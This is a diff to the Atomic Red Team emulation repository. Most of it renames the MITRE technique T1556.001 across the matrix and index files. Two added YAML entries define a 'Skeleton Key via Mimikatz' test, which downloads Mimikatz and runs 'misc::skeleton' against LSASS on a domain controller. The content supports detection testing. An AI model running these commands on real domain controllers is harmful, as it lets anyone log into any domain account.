 |  |  | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
-|  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
+|  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Plist File Modification](../../T1647/T1647.md) |  |  |  |  |  |  |  |
 |  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -176,7 +176,7 @@
 |  |  |  |  | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -46,7 +46,7 @@
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
@@ -76,7 +76,7 @@
 |  |  | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
+|  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
 |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
 |  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
@@ -135,7 +135,7 @@
 |  |  |  |  | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -11566,7 +11566,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11596,6 +11596,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -33296,7 +33297,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -33326,6 +33327,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -45659,7 +45661,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -45689,6 +45691,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11541,7 +11541,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11571,6 +11571,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32733,7 +32734,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32763,6 +32764,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44936,7 +44938,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44966,6 +44968,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11470,7 +11470,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32017,7 +32018,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32048,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44146,7 +44148,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44178,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11470,7 +11470,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32133,7 +32134,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32163,6 +32164,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44320,7 +44322,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44350,6 +44352,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11470,7 +11470,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32017,7 +32018,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32048,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44146,7 +44148,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44178,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11895,7 +11895,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11925,6 +11925,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32803,7 +32804,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32833,6 +32834,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -45064,7 +45066,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -45094,6 +45096,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11550,7 +11550,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11580,6 +11580,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32637,7 +32638,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32667,6 +32668,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -45231,7 +45233,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -45261,6 +45263,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -11511,7 +11511,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -11541,6 +11541,7 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1027.006:
    technique:
@@ -32495,7 +32496,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -32525,6 +32526,7 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -44741,7 +44743,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -44771,6 +44773,7 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
+      identifier: T1556.001
    atomic_tests: []
  T1556.005:
    technique:
@@ -27965,7 +27965,7 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -27995,7 +27995,54 @@ defense-evasion:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
  T1027.006:
    technique:
      type: attack-pattern
@@ -73171,7 +73218,7 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -73201,7 +73248,54 @@ persistence:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
  T1556.005:
    technique:
      type: attack-pattern
@@ -98485,7 +98579,7 @@ credential-access:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
      description: "Adversaries may patch the authentication process on a domain controller
        to bypass the typical authentication mechanisms and enable access to accounts.
        \n\nMalware may be used to inject false credentials into the authentication
@@ -98515,7 +98609,54 @@ credential-access:
      x_mitre_platforms:
      - Windows
      x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
